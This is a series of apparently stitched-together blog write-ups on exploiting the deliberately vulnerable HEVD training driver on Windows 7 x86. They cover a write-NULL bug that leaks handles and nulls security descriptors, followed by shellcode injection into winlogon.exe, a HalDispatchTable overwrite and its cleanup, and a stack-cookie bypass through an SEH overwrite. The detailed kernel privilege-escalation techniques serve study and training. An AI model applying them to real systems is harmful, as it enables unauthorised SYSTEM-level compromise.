Since IOCTLdrive connection is predefined, we can test it and see that our first 4 bytes from user-buffer (shellcode_ptr), is about to be nullified with 0x00000000.

Placing a breakpoints on strategic addresses and running it.
Reading important addresses using WinDBG cmd

After script run, and hit break-point, we can clearly notice that [edi] value contains our address to the pointer of user-buffer address shellcode_ptr -> 0x00500000.

Reading important addresses using WinDBG cmd

As an example, the content of our shellcode is storing a piece of x86 assemblycode to LPE our permissions. At your first 4 bytes, you can see that have the initial parts of our shellcode start. Now ignoring the code located there, we’re only looking into 0xa16460cc address.

Here, you can see the vulnerability since ebx=0x00000000 is being overwriting our value inside user-buffer eax=0xa16460cc.

The problem here is obvious, as a simple user (ring3), if we send a whatever address, it will be nullified, no matter what or how, just it will stay NULL.

Said all that, we know from here that we actually only can write NULL bytes to our defined address/pointer, and do some magic to achieve LPE from there, but… how can we do that? Let’s talk about DACL & Security Description.

DACL & Security Description

First of all, what is DACL and Security Description? how them can be exploited using Arbitrary Write NULL vulnerabilities?

According to

What is DACL (Discretionary Access Control List)?
A DACLstands for Discretionary Access Control List, in Microsoft Windows family, is an internal list attached to an object in Active Directory that specifies which users and groups can access the object and what kinds of operations they can perform on the object. In Windows 2000 and Windows NT, an internal list attached to a file or folder on a volume formatted using the NTFS that has a similar function.
How DACL works?
In Windows, each object in Active Directory or a local NTFS volume has an attribute called Security Descriptor that stores information about
The object’s owner (the security identifier or the owner) and the groups to which the owner belongs.
The discretionary access control list (DACL) of the object, which lists the security principals(users, groups, and computers) that have access to the object and their level of access.
The system access control list (SACL), which lists the security principals that should trigger audit events when accessing the list.

Basically, DACL is a list that contains features, one of them are called Security Description (we will take deep soon). This list are configured to handle calls and filter what object (files, processes, threads, etc), should be allowed or not for specific (user, groups, or computers). Hard to understand? Let me show up it as Window UI. =)

Maybe this image should be familiar to you right?. This area is one of various that you can manage DACL & Security Descriptions easily (without knowing that they actually exists).

As we can see, isn’t hard to understand what it is and why it was created, the thing is, what defines internally what permissions an user can have on it? What objects are configured in DACL to be filtered? let’s have a deep look into Windows Internals and his structs.

First of all, let’s take a look at WinDBG process list.

WinDBG processes list

When we do list our windows processes in WinDBG, we can see that every process have the same patterns, only with different values or addresses ranges. In the image above, you can notice a marked address 0x856117c8, this address represents a windows object, and this object have some important properties which defines: process name, permissions, process ID’s, handles, etc. (i’ll not extend this, so let it just as a simple recap).

A interesting thing that we can explore at moment, isn’t any else then nt!_OBJECT_HEADER struct. This struct have literally what tools we need to work and start our attack.

Getting nt!_OBJECT_HEADER address from System (PID:4) process
Viewing information about System (PID:4) process header

As an image above says, we simply dissect our process utilizing nt!_OBJECT_HEADER struct, which gave us information about what is located in our object. Also it’s important to notice that nt!_OBJECT_HEADER only look for addresses offsets before nt!_EPROCESS, which means that nt!_EPROCESS range, should stay after those offsets.

But what happens to SecurityDescription?

SecurityDescription poiting to 0x8c005e1f

Another interesting thing is that our SecurityDescription (0x856117b0+0x014) is pointing to 0x8c005e1f address, meaning that something is happening here, and this address have some interaction to DACL & Security Description implementations.

Now, let’s have a deep look in this specific address 0x8c005e1f.

Visualizing SecurityDescription struct from System (PID:4) Process

Utilizing previous target SecurityDescriptionaddress with WinDBG command !sd, with simple bit calculation, we now are able to understand much better how it’s implementation are configured on Windows Internals. So, those marked value, remember you something? Yes, that’s right, this marks are the users information stored in the process. At image below, we can compare these two DACL information.

SYSTEM and DAML users (colors compared to last image)

As we can compared these two images, we notice that SYSTEM and DAML users, are related to another image about SecurityDescription(Windows Internals). It’s a example (not legit), that how we can compare this two values.

Knowing that, and understanding the concepts that we actually can nullify any address from ring0 (kernel) only as an simple user, let’s try to make SecurityDescription address (0x856117b0+0x014) point to NULL (0x00000000), and see what happens!

SecurityDescription poiting to 0x8c005e1f
Nullifying SecurityDescription Pointer
Results after nullification of the pointer

Ok! now System.exe (PID:4) process have SecurityDescriptor pointer nullified. Now let’s try to continue our VM snapshot.

Maybe you don’t understand, but it’s written “Do you want close [System] Process?”
ERROR: DCOM server process launcher service terminated unexpectedly
Wait, what happened? we closed [System.exe] process manually? and without user permissions for it? using task manager?

Yes! only nt authority/SYSTEM should have permissions to close this process, but how could be possible a simple user BSOD'ed whole system? There’s, the magic behind this exploitation is a well-know exploitation technique which nullify SecurityDescription behaviors from SYSTEM processes, it technique is very used for LPE exploits since it applies no permissions bit for those target processes. In short, from WinDBG we manually nullified the pointer which contains those permissions information in SecurityDescription meaning that anyone now can write/read/execute in this process. =)

But there’s a problem here, we now understand what we need to do in order to elaborate our exploit but i ask you, how we can identify SYSTEM process objects from a simple ring3 (user-land)?

WinDBG processes list

In the image above, since we’re looking those addresses from WinDBG screen ring0 (kernel mode), we clearly see the object there, but also we need to know that those values are not accessible (also unpredictable), to our simple user from ring3 (user-land). The randomization of these addresses are implemented every time since Windows 7 is rebooted (Address Space Layout Randomization or ASLR), these mitigations deny every try to work with static address. Lastly, another important thing is that the randomization by self are unpredictable (in most of my tests), these objects only randomize through 0x85xxxxxx to 0x87xxxxxx, which means i actually don’t know if a bypass of this randomization (from ring3), actually exists.

So, what to do next?

NtQuerySystemInformation - Handle Leaking Attack

As mentioned before, isn’t possible to exploit from ring3 (user-land) due to a lot of permissions restrictions placed by our target “Operation System (windows 7)so what kind of things can we do to bypass these restrictions? the answer is NtQuerySystemInformation WinAPI call.

NtQuerySystemInformation by design is one of various security flaws that for Microsoft only represents a feature to an user perspective. The biggest problem about it WinAPI call, is that it’s configured by default to accept user calls (from undocumented behaviors), which should be parsed and queried together ring0 (kernel mode) information, as resulting in an leak of SYSTEM addresses/pointers. This WinAPI Call, is a well-know method for memory leaking attacks, since it’s allow an attacker to know exactly what pointers are important, and elaborate a better methodology for explore his target vulnerability (in our case WriteNULL).

But how could it be possible to leak information from ring3?

Before we start to looking deep into vulnerable (features) calls, we should look at first to the definition of handles, and why we need to get focus on it.

according to:

It’s an abstract reference value to a resource, often memory or an open file, or a pipe.
Properly, in Windows, (and generally in computing) a handle is an abstraction which hides a real memory address from the API user, allowing the system to reorganize physical memory transparently to the program. Resolving a handle into a pointer locks the memory, and releasing the handle invalidates the pointer. In this case think of it as an index into a table of pointers… you use the index for the system API calls, and the system can change the pointer in the table at will.
Alternatively a real pointer may be given as the handle when the API writer intends that the user of the API be insulated from the specifics of what the address returned points to; in this case it must be considered that what the handle points to may change at any time (from API version to version or even from call to call of the API that returns the handle) — the handle should therefore be treated as simply an opaque value meaningful only to the API.

In short, handles have properties to create and configure communications through objects (open files I/O, apis, pipes, etc), on Operation System (OS). These handles are carrying a bunch of information about these objects, one of them are pointers. Basically, handles loads pointers, but do you know the best part of it? is the possibility to leak these pointer from ring3 (user-land), and that’s what we need to deep our look.

Knowing that, NtQuerySystemInformation afford a lot interesting calls, on top of that, we have an undocumented call named SystemExtendedHandleInformation, which supports the follow structs.


These structs, should help us to leak handle pointers, and that’s how the magic starts.

Utilizing the designed flaw calls, let me fuzz some handle data from ring3 (user-mode) perspective and see what happens.

Piece of code to leak handles data
This part will loop all handles and get his data
Script running and leaking pointers from ring3 (user-land) (PID:444)
Script running and leaking pointers from ring3 (user-land) (PID:1240)
[11931] Leaked pointers found it

As you can see, from a simple user we actually can leak a lot of pointers and data. The best part of it, is that one of those pointers are correlated to our PROCESS object, did you remember?

WinDBG processes list

This is it, that’s the trick! But there’s a problem. Assuming that many restrictions such as: ASLR, are configured by default, how we knows what addresses, PID’s and Handle values are correct in order to predict that one who contains our PROCESS object pointer?

The answer for this question is: “I don’t know, but there’s a method (really not stealth), which work as well!”. This method was discovered after tests assuming ASLR randomization and what processes (who contains useful pointers), should crash after been nullified through exploitation technique.

After some tests, it was noticed that if we define lsass.exe PID, as the only target to have his handles nullified, the Operation System OS doesn’t crashes (I assume that because lsass.exe isn’t a process that contains so many handles for SYSTEM internals, only to hold permissions and things related on this). After all, with lsass.exe handle pointers nullified, it’s clearly that not only 1 process will have write/read/execute permission, but also a lot. That’s why i don’t recommend this technique for a real world exploitation because isn’t safe (also not stealthy), nullifying handles could make the Operation System crash and reboot.

Source-code modified in order to filter only handles from “lsass.exe” PID
Source-code modified in order to filter only handles from “lsass.exe” PID

The things is, once SYSTEM processes do have access permissions for Anyone, the final part should be a Shellcode Injection in a SYSTEM target process, and that’s what we do in winlogon.exe. This process is running with SYSTEM permissions (and now after nullify attack write/read/execute)

So, putting all together, this is how it looks like. =D

Nullifying “lsass.exe” handle pointers “SecurityDescription”, and injecting “LPE shellcode” at “winlogon.exe” process.

After exploit runs, we finally got our nt authority/SYSTEMshell, nothing was crashed and processes work as well without any issues.

The final consideration for this write-up, is that i didn’t found any reliable solution for WriteNULL challenge, only one which uses another driver vulnerability in order to leak pointer address (on references), meaning that this exploit should be the only one existing in internet utilizing this technique (really no one want to do this). =(

So, it was kind fun and hope everyone enjoyed this write-up. =P

Final Exploit link:

Improving the write-what-where HEVD PoC (x86, Win7)

17 October 2021 at 20:12


This one is about another HEVD exercise (look here to see the my previous HEVD post); the arbitrary write ( The main reason I decided to write up my experience with it is the fact that it instantly occurred to me that the official exploitation process, used both in the original PoC as well as described here, leaves the kernel in an unstable state with high probability of crash anytime after the exploit is run. So, this post is more about the exploitation technique, the problem it creates and the solution it asks for, rather than the vulnerability itself. It also occurred to me that doing HEVD exercises fully (like understanding exactly what and how) is quite helpful in improving the general understanding of how the operating system works.

When it comes to stuff like setting up the environment, please refer to my earlier HEVD post. Now let's get started.

The vulnerability

This one is a vanilla write-what-where case - code running in kernel mode performs a write operation of an arbitrary (user-controlled) value into an arbitrary (user-controlled) address. In case of a x86 system (we keep using these for such basic exercises as they are easier while debugger output with 32-bit addresses is more readable), it usually boils down to being able to write an arbitrary 32-bit value into an arbitrary 32-bit address. However, it is also usually possible to trigger the vulnerability more than once (which we will do in this case, by the way, just to fix the state of the kernel after privilege escalation), so virtually we control  data blocks of any size, not just four bytes.

First of all, we have the input structure definition at - it's as simple as it could be, just two pointers:

Then, we have the TriggerArbitraryWrite function in (screenshot below). First, we have a call to ProbeForRead on the input pointer, to make sure that the structure itself is located in user space (both ProbeForRead and ProbeForWrite methods throw an access violation exception if the address provided turns out to belong to the kernel space address range). Then, What and Where values held by the structure (note that these are both pointers and there are no additional checks here whether the addresses those pointers contain belong to kernel or  user space!) are copied into the local kernel mode function variables:

Then, we have the vulnerable write-what-where:

Now, let's see how this C code actually looks like after it's compiled (disassembly view in windbg):


So, as always, we just want to run our shellcode in kernel mode, whereas the only thing our shellcode does is overwriting the security token of our exploit process with the one of the SYSTEM process (token-stealing shellcode).  Again, refer to the previous blog post to get more details on the shellcode used.

To exploit the arbitrary write-what-where to get our shellcode executed by the kernel, we want to overwrite some pointer, some address residing in the kernel space, that either gets called frequently by other processes (and this is what causes trouble post exploitation if we don't fix it!) or is called by a kernel-mode function that we can call from our exploit process (this is what we will do to get our shellcode executed). In this case we will stick to the HalDispatchTable method - or to be more precise, HalDispatchTable+0x4. The method is already described here (again, I recommend this read), but let's paraphrase it.

First, we use our write-what-where driver vulnerability to overwrite 4 bytes of the the nt!HalDispatchTable structure (nt!HalDispatchTable at offset 0x4, to be exact). This is because the NtQueryIntervalProfile function - a function that we can call from user mode - results in calling nt!KeQueryIntervalProfile (which already happens after switching into kernel mode), and that function calls whatever is stored at nt!HalDispatchTable+0x4:

So, the idea is to first exploit the arbitrary write to overwrite whatever is stored at nt!HalDispatchTable+0x4 with the user-mode address of our shellcode, then call the NtQueryIntervalProfile only to trick the kernel into executing it via calling HalDisaptchTable+0x4 - and it works like a charm on Windows 7 (kernel mode execution of code located in user mode buffer, as no SMEP in place).

The problem

The problem is that nt!HalDispatchTable is a global kernel structure, which means that once we tamper it, it will still be there if any other program refers to it (e.g. calls NtQueryIntervalProfile). And it WILL affect whatever we will be doing enjoying our SYSTEM privileges, because it WILL crash the entire system.

Let's say that the buffer holding our shellcode in our user mode exploit is at 00403040. If we overwrite the original value of nt!HalDispatchTable+0x4 with it, that shellcode will only be reachable and thus callable if the current process being executed is our exploit. Once the scheduler interrupt switches the current CPU core to another process, in the context of that process the user mode virtual address of 00403040 will either be invalid (won't even fall into any committed/reserved virtual address range within the virtual address space used by that process) or it will be valid as an address, but in reality it will be mapped to a different physical address, which means it will hold something completely different than our shellcode. Remember, each process has its own address space, separate from all other processes, whereas the address space of the kernel is global for the entire system. Therefore every kernel space address makes sense to the entire system (kernel and all processes), whereas our shellcode at 00403040 is only accessible to our exploit process AND the kernel - but only when the process currently being executed is our exploit. The same address referred to from a different process context will be invalid/point at something completely different.

So, after we tamper HalDispatchTable+0x4 by overwriting it with the address of the shellcode residing in the memory of the current process (our exploit) and call NtQueryIntervalProfile to get the shellcode executed, our process should now have SYSTEM privileges (and so will any child processes it spawns, e.g. a cmd.exe shell).

Therefore, if any other process in the system, after we are done with privilege escalation, calls NtQueryIntervalProfile, it will as well trick the kernel into trying to execute whatever is located under the 00403040 address. But since the calling process won't have this address in its working set or will have something completely different mapped under it, it will lead to a system crash. Of course this could be tolerated if we performed some sort of persistence immediately upon the elevation of privileges, but either way as attackers we don't want disruptions that would hurt our customer or potentially tip the defenders off. We don't want system crashes.

This is not an imaginary problem. Right after running the initial version of the PoC (which I put together based on the official HEVD PoC), all of the sudden I saw this in windbg:

Obviously whatever was located at 0040305b  at the time ( 000a - add byte ptr [edx],cl), was no part of my shellcode. So I did a quick check to see what was the process causing this - by issuing the !vad command to display the current process VADs (Virtual Address Descriptors), basically the memory map of the current process, including names of the files mapped into the address space as mapped sections - which includes the path to the original EXE file:

One of svchost.exe processes causing the crash by calling HalDispatchTable+0x4

One more interesting thing is that - if we look at the stack trace (two screenshots above) - the call of HalDispatchTable+0x4 did not originate from KeQueryIntervalProfile function, but from nt!EtwAddLogHeader+0x4b. Which suggests that  HalDispatchTable+0x4 is called from more places than just NtQueryIntervalProfile, adding up to the probability of such a post-exploitation crash being very real.

The solution

So, the obvious solution that comes to mind is restoring the original HalDispatchTable+0x4 value after exploitation. The easiest approach is to simply trigger the vulnerability again, with the same "where" argument ( HalDispatchTable+0x4) and a different "what" argument (the original value as opposed to the address of our user mode shellcode).

Now, to be able to do this, first we have to know what that original value of nt!HalDispatchTable+0x4 is. We can't try to read it in kernel mode from our shellcode, since we need to overwrite it first in order to get the shellcode execute in the first place. Luckily, I figured out it can be calculated based on information attainable from regular user mode execution (again, keep in mind this is only directly relevant to the old Windows 7 x86 I keep practicing on, I haven't tried this on modern Windows yet, I know that SMEP and probably CFG would be our main challenges here).

First of all, let's see what that original value is before we attempt any overwrite. So, let's view nt!HalDispatchTable:

The second DWORD in the memory block under nt!HalDispatchTable contains 82837940. Which definitely looks like an address in kernel mode. It has to be - after all, it is routinely called from other kernel-mode functions, as code, so it must point at kernel mode code. Once I called it up with dt command, windbg resolved it to HaliQuerySystemInformation. Running disassembly view command uu on it, revealed the full symbol name (hal!HaliQuerySystemInformation) and showed that in fact there is a function there (just based on the first few assembly lines we can see it is a normal function prologue).

OK, great, so we know that nt!HalDispatchTable+0x4, the pointer we abuse to turn arbitrary write into a privilege escalation, originally points to a kernel-mode function named hal!HaliQuerySystemInformation (which means the function is a part of the hal module).

Let's see more about it:

Oh, so the module name behind this is halacpi.dll. Now we both have the function name and the module name. Based solely on this information, we can attempt to calculate the current address of hal!HaliQuerySystemInformation dynamically. To do this, we will require the following two values:

  1. The current base address the halacpi.dll module has been loaded (we will get it dynamically by calling NtQuerySystemInformation from our exploit).
  2. The offset of the HaliQuerySystemInformation function within the halacpi.dll module itself (we will pre-calculate the offset value and hardcode it into the exploit code - so it will be version-specific). We can calculate this offset in windbg by subtracting the current base address of the halacpi.dll kernel-mode module (e.g. taken from the lmDvmhal command output) from the absolute address of the  hal!HaliQuerySystemInformation function as resolved by windbg. We can also calculate (confirm) the same offset with static analysis - just load that version of halacpi.dll into Ghidra, download the symbols file, load the symbols file, then find the static address of the function with its address within the binary and subtract the preferred module base address from that address.

Below screenshot shows the calculation done in windbg:

Calculating the offset in windbg

Below screenshots show the same process with Ghidra:

Preferred image base - 00010000
Finding the function (symbols must be loaded)
HaliQuerySystemInformation static address in the binary (assembly view)

Offset calculation based on information from Ghidra: 0x2b940 - 0x10000 = 0x1b940.

So, during runtime, we need to add 0x1b940 (for this particular version of halacpi.dll - remember, other versions will most likely have different offsets) to the dynamically retrieved load base address of halacpi.dll, which we retrieve by calling NtQuerySystemInformation and iterating over the buffer it returns (see the PoC code for details). The same function, NtQuerySystemInformation, is used to calculate the runtime address of the HalDispatchTable - the "what" in our exploit (as well as the  original HEVD PoC code and many other exploits of this sort). In all cases  NtQuerySystemInformation is called to get the current base address of the ntoskrnl.exe module (the Windows kernel). Then, instead of using a hardcoded (fixed) offset to get HalDispatchTable, a neat trick with LoadLibraryA and GetProcAddress is used to calculate it dynamically during runtime (see the full code for details).

The reason I could not reproduce this fully dynamic approach of calculating the offset from the base (calling LoadLibrary(halacpi.dll) and then GetProcAddress(HaliQuerySystemInformation)) to calculate hal!HaliQuerySystemInformation and used a hardcoded, fixed, manually precalculated 0x1b940 offset instead, is because the HaliQuerySystemInformation function is not exported by halacpi.dll - whereas GetProcAddress only works for functions that have their corresponding entries present in the DLL Export Table.

Full PoC

The full PoC I put together can be found here:

nt/system shell still running after the exploit process's exit
The original HalDispatchTable+0x4 restored after exploit execution

HEVD StackOverflowGS x86 Win7 - exploitation analysis

5 October 2021 at 06:00


This post is about kernel mode exploitation basics under Windows. It operates on assumptions that the reader is familiar with terms such as process, thread, user and kernel mode and the difference between user and kernel mode virtual address range. One could use this post as an introduction to HEVD.

Even though I came across at least one good write up about Hacksys Extreme Vulnerable Driver StackOverflowGS (, highly recommend it), after reading it I still felt that I did not understand the entire exploitation process (did not notice the link to the source code at the time :D), so I fell back on the PoC provided by HEVD (, analyzed it and learned a few things, now I am just sharing my insights and tips.


There are numerous resources on how to set up Windows kernel debugging and install HEVD (e.g. and

I personally prefer using my host OS as the debugger and a VirtualBox VM as the debuggee (Windows 7, x86).

VM setting of the serial port for debugging

To attach to the VM, I run the following command (make sure windbg.exe is in your %PATH%):

windbg -k com:pipe,port=\.\pipe\com_1,resets=0,reconnect

When successfully attaching a debuggee, windbg output will look like this:

I myself have experienced issues when rebooting the debuggee (which happened a lot with all the crashes resulting from my attempts at exploitation) with windbg running; it just didn't want to attach to the named pipe and thus there was no connection between windbg and the debuggee. Also, trying to attach to a VM that was already running didn't work this way either. I figured that for me everything always works as should when I first boot the VM and then, once the OS loading progress bar pops up, I run the command to spawn windbg and make it connect to the named pipe created by VirtualBox.

Also, don't forget to load the symbols, e.g.:

.sympath C:\Users\ewilded\HACKING\VULNDEV\kernel\windows\HEVD\HEVD.1.20\drv\vulnerable\i386;SRVC:\SymbolsServer

The vulnerability

StackOverflowGS (code here is a vanilla stack-based buffer overflow, just like StackOverflow (code here The only difference is that in this case stack smashing is detected via a stack canary/stack cookie (a good introduction to the subject can be found here).

All HEVD exercises have the same structure and are all called in the same manner.

Whenever a user wants to interact with the module, they send the driver a data structure -  IRP ( This data structure is our malicious input vector.

On line 128 of the HackSysExtremeVulnerableDriver.c main driver source file, we can see that IrpDeviceIoCtlHandler function is assigned to IRP_MJ_DEVICE_CONTROL packets:

That function can be found in the same file, starting with line 248:

Depending on the IOCTL code (an unsigned long integer argument, part of the IRP), IrpDeviceIoCtlHandler runs a different function:

Constants like HEVD_IOCTL_BUFFER_OVERFLOW_STACK are numeric variables predefined in HackSysExtremeVulnerableDriver.h.

So each exercise has its corresponding function with "IoctlHandler" suffix in its name (BufferOverflowStackIoctlHandler, BufferOverflowStackGSIoctlHandler and so on). Let's see what this function looks like in our case (

So there is another function, named TriggerBufferOverflowStackGS, run from BufferOverflowStackGSIoctlHandler. So the function call tree, starting from IrpDeviceIoCtlHandler, is now:

Finally, the function is pretty simple too:

UserBuffer is a pointer to the user mode memory block (valid in the address space of the process that is currently interacting with the driver). Kernel mode code will be reading data from this location.

Size is an integer telling HEVD how many bytes we want it to read from the UserBuffer memory block - and write to kernel memory, starting at KernelBuffer. KernelBuffer is a local variable (defined on line 72 visible in the screenshot above), so it resides on the stack.

Both the UserBuffer pointer and the Size are delivered with the IRP and controlled by the user mode program that created it and triggered an interrupt to communicate with this driver (we'll get to that code too, shortly).

Then we get to the bottom of this:

So basically it's a vanilla stack-based buffer overflow. We can overwrite KernelBuffer with UserBuffer, with Size bytes (we control both UserBuffer and Size).

Let's set up a breakpoint in windbg, at HEVD!TriggerStackOverflowGS:

By listing the breakpoint (bl) we can see the current kernel mode address of the function (87e3f8da), which will vary between platforms and system boots.

View the disassembly of the entire function we can notice two important points in the code:

First is our vulnerable memcpy call, the second is the SEH_epilog4_GS, the function responsible for checking the saved stack canary and preventing from normal returning if the stack was detected to be smashed (if the cookie doesn't match), aimed at preventing exploitation.

Naturally, a breakpoint at 87e3f964 e871c8ffff      call    HEVD!memcpy (87e3c1da) would be more precise, as we could see directly how the stack buffer looks like before and after memcpy executes. Let's set it:

By listing the existing breakpoints again, we can see that windbg neatly displays both addresses using properly resolved symbols, so our second breakpoint set using the address 87e3f964 got nicely resolved to HEVD!TriggerStackOverflow+0x8a. I personally prefer to save these, so I can use them later when running again, just to remember where the actual breakpoint I am interested in is.

Now, we need to interact with the driver in order to see how the buffer we supply is stored on the stack, what do we overwrite and how error conditions we cause this way will differ depending on the buffer size.

For this purpose, I assembled a simple piece of C code based on other existing HEVD PoCs (I use Dev-C++)

  • it offers two payload types; a string of A-s or up to 3072 bytes of de Brujin sequence,
  • it asks for the size argument that will be sent over to the driver.

Below screenshot demonstrates running it in order to send a 512-byte buffer filled with 'A':

At this point we should hit the first breakpoint. We just let it go (g) and let it hit the second breakpoint (just before memcpy):

Let's see the stack:

Now, let's just step over once (p), so we get to the next instruction after the memcpy call, and examine the stack again:

So we can clearly our 512-byte buffer filled with 'A'. Now, at this point there is no buffer overflow.

Now, the next value on stack, right after that buffer (in this case 070d99de), is the stack cookie.

By the way, this is a good opportunity to notice the call stack (function call tree):

We can see that our saved return address is 87e3f9ca (HEVD!TriggerStackOverflowGS+0x8f)(red). The SEH handler pointer we will overwrite is sitting between the stack cookie and the saved RET (green):

If we let it running further (g), we can see nothing happens and fuzz.exe returns:

Good, as the buffer was 512, there was no overflow, everything returned cleanly.

Now, let's see what happens when we increase the buffer size by just one:

First two breakpoints hit, nothing to see yet:

Now, let's step over (p or F10) and see the stack again. This time we overwrote the stack cookie, by one byte (0d9bb941):

Now, let's let the debuggee go and see what happens (also, note the !analyze -v link generated in windbg output - click on it/run the command to see more details about the crash):

We end up with a fatal error 0x000000f7 (DRIVER_OVERRAN_STACK_BUFFER), which means that the __SEH_epilog4_GS function detected the change in the cookie saved on the stack and triggered a fatal exception.

Just as expected.

It is important to pay close attention to the error code, especially in this case: 0x000000f7 (DRIVER_OVERRAN_STACK_BUFFER) looks a lot like 0x0000007f (DOUBLE_TRAP), whereas the second one basically means that some sort of exception was triggered while already executing some exception handler - in other words, it means that after one exception, the code handling the exception encountered another exception. Distinguishing between these two (easy to mix up) is crucial while developing this exploit, as while the first one indicates that the stack cookie was overwritten and that the SEH __SEH_epilog4_GS has executed and detected the tampering to prevent exploitation. On the other hand, 0x0000007f (DOUBLE_TRAP) indicates that we triggered an exception and that afterwards another exception was raised. We can trigger an access violation by providing sufficiently large value of the Size argument in an IRP, causing the kernel-mode memcpy call to either read beyond the page of the user-mode process working set, or write beyond the kernel stack, depending on which happens first).

Exploitation approach

When it comes to stack cookies, there are several bypass scenarios.

The stack cookie could be leaked by exploiting another vulnerability (chaining, just like in one of my previous write ups) and then used in the payload to overwrite the original value of the canary cookie with the original value, making the entire stack-smashing invisible to the stack canary-checking routine called in the function's epilogue.

Another chaining method involves overwriting the process-specific pseudo-random value of the current cookie in the process memory, wherever it is stored (depending on the OS and compiler).

And then finally there is the third exploitation approach, abusing the fact that exception handlers are executed before the stack cookie is checked. Sometimes it is possible to abuse exception handling code - in this case a SEH handler pointer, which is also stored on the stack in a location we can overwrite. The idea is to abuse the memory corruption vulnerability in such a way that we overwrite a pointer to an exception handler and then we trigger an exception within the same function, before the stack checking routine in the function's epilogue is executed. This way we redirect the execution to our payload (our shellcode), which first elevates our privileges (in this case, as it's a local kernel EoP exploit), then returns to the parent function (the function that called the function we are exploiting - the parent in the call stack/call tree), without ever running the stack cookie-checking routine.

Again, please refer to for more details on the general subject of defeating stack cookies under Windows.

HEVD official PoC

The tricky part in this exercise is that we have to do both things with one input (one device interaction, one IRP with a buffer pointer and size, one call of the TriggerStackOverflowGS function); overwrite the pointer to the SEH exception handler AND cause an exception that the handler would be used for.

The only viable option here is to cause the vulnerable memcpy call itself first  overwrite the buffer along with the saved stack cookie and the SEH handler pointer AND trigger an access violation exception - either due to exceeding the size of the user mode buffer and reading past the memory page that holds it, or by writing past the stack boundary (whichever happens first). Now, writing down the stack would completely wipe out all the older (parent) stack frames, making it super hard to return from the shellcode in a way that would avoid crashing the system. Thus, having the kernel code read past the user-supplied user mode buffer is a much better option - and I really like the way this has been solved in the original HEVD PoC (

The entire payload that is introduced into the kernel buffer (bytes we write to the stack) is 532 bytes long. It's 512 bytes of the original buffer, 4 bytes of the stack cookie, 12 bytes of other 3 DWORDs that we don't care about (in the payload referred to as junk) and then finally 4 bytes of the SEH handler. 512 + 4 + 12 + 4 = 532. This is the exact number of bytes that need to be written to the stack for the SEH handler pointer to be overwritten with a value we control.

Now, in order to trigger an access violation exception in the same operation (memcpy), just after our 532 bytes from our user mode buffer were copied into the kernel mode stack, we want to place our 532-byte payload at the end of a page (the basic memory allocation unit provided by the OS memory manager, 4096 bytes by default). So from our user mode program, we allocate a separate page (4096-byte buffer). Then we put our payload into its tail (last 532 bytes) - so our payload starts on the 3565-th byte and ends on the 4096-th (the last 4 bytes being the pointer to our shellcode).

Finally, to trigger an access violation, we adjust the buffer size parameter sent encapsulated in the IRP, to exceed the size of our payload (so it must be bigger than 532, e.g. 536). This will cause memcpy running in kernel mode to attempt reading four bytes beyond the page our payload is located in. To make sure this causes an access violation, the page must not have an adjacent/neighbor page. So for example, if the virtual address of the user mode page allocated for the buffer with our payload is 0x00004000, with page size being 0x1000 (4096), the valid address range for this page will be 0x00004000 <--> 0x00004fff. Meaning that accessing address 0x00005000 or higher would mean accessing another page starting at 0x00005000 (thus we call it an adjacent/neighbor page). Since we want to achieve an access violation, we need to make sure that no memory is allocated for the current (exploit) process in that range. So we want just one, alone page allocated, reading past which causes an access violation.

There are a few ways to cause such a violation. For example, two adjacent pages can be allocated, then the second one could be freed, then the read operation is triggered on the first one, with the size operand making it read beyond the first page, entering the second one. And this is the method employed by klue's PoC:, with his mmap and munmap wrappers around NtAllocateVirtualMemory and NtFreeVirtualMemory.

Another one is to allocate the page in a way that ensures nothing else is allocated in the adjacent address space, which is what the official HEVD exploit does by using an alternative memory allocation method supported by Windows.

Let's  analyze the code (

First, we have declarations. hFile is used for opening the driver object (in order to then send the IRP) . PageSize is 0x1000 (4096). MemoryAddress is the pointer to the special page we are going to allocate our stack-smashing payload (528 bytes of junk, 4 bytes overwriting the SEH handler pointer, pointing at our shellcode, located at the page's tail, starting at 3565-th byte). SuitableMemoryForbuffer is the pointer we are going to pass to HEVD as the UserBuffer. It will point at the 3565-th byte of the 4096-byte page allocated at MemoryAddress. EopPayload is another pointer, another location in user mode, containing our shellcode (so the shellcode is in a separate user mode buffer than the special page we are allocating for the stack-smashing payload):

Variable declarations

Finally, there is SharedMemory - a handle to the mapped file object we are going to create (as an alternative way of allocating memory). Instead of requesting a new page allocation with VirtualAlloc, an empty, non-persisted memory mapped file is created. Memory-mapped files are basically section objects (described properly in Windows Internals, Part 1, "Shared memory and mapped files" section), a mechanism used by Windows for sharing memory between processes (especially shared libraries loaded from the disk), also please see the official Microsoft manual to find out more about

In this case, we are going to request creation of a "mapped-file" object without any file, by providing an INVALID_HANDLE_VALUE as the first argument to CreateFileMappingA - this scenario is mentioned in the manual page of this function (

So it's basically a section ("mapped file") object only backed by the system paging file - in other words, a region in the system paging file that we can map to our process's address space and use just like (almost) a regular page:

Creation of a mapped file object

 Now, we map that region to our address space:

Mapping the object to the current process address space

Now, we're setting the SuitableMemoryForBuffer pointer at 3565-th byte of the SharedMemoryAddress region (this is where we will locate our 532-byte payload that will be then copied by the driver to a buffer on its stack):

Setting the payload pointer at 3565-th byte of the 4096 memory region

And we will the entire region with 'A':

Filling the entire 4096-byte region with 'A'

Then eventually, the payload is finished by setting its last 4 bytes to contain the user mode address of the shellcode (these bytes will overwrite the SEH handler). This is done in a bit indirect way, as first the pointer (MemoryAddress) is set at offset 0x204 (516) - right past the xored stack cookie - and overwrites 3 of the following junk pointers, only to eventually set the new value for the SE handler:

Grooming the buffer - this is tricky

It seems that simply setting the MemoryAddress to point at SuitableMemoryForBuffer + 0x210 directly (to point it at the location that will overwrite the SE handler pointer) would do the trick as well - other locations on the stack would be overwritten with meaningless 'A's anyway:

Then finally, we trigger the creation of our IRP and send it to the driver along with pointers to the UserBuffer (SuitableMemoryForBuffer - 3656-th byte of the 4096-byte region) and the Size argument; SeHandlerOverwriteOffset + RAISE_EXCEPTION_IN_KERNEL_MODE. SeHandlerOverwriteOffset is just the size of our payload (532). Then, a constant RAISE_EXCEPTION_IN_KERNEL_MODE is added to the size - it's just a numeric constant of 0x4 - and it's only to make the size argument exceed 4096 when added to the 3656-th byte being provided as the beginning of the buffer to read from:

Finally, talking to the driver


Our shellcode being a separate buffer in user mode, which will get executed by kernel mode HEVD code, instead of the legitimate exception handler - on modern kernels this would not get executed due to SMEP, but we're doing the very basics here.

First of all, let me recommend ShellNoob. It's a neat tool I always use whenever I want to:

  • analyze a shellcode (a sequence of opcodes) or a just some part of it,
  • write shellcode.

In this case we will use a slightly modified version of the publicly available, common Windows7 token-stealing payload (

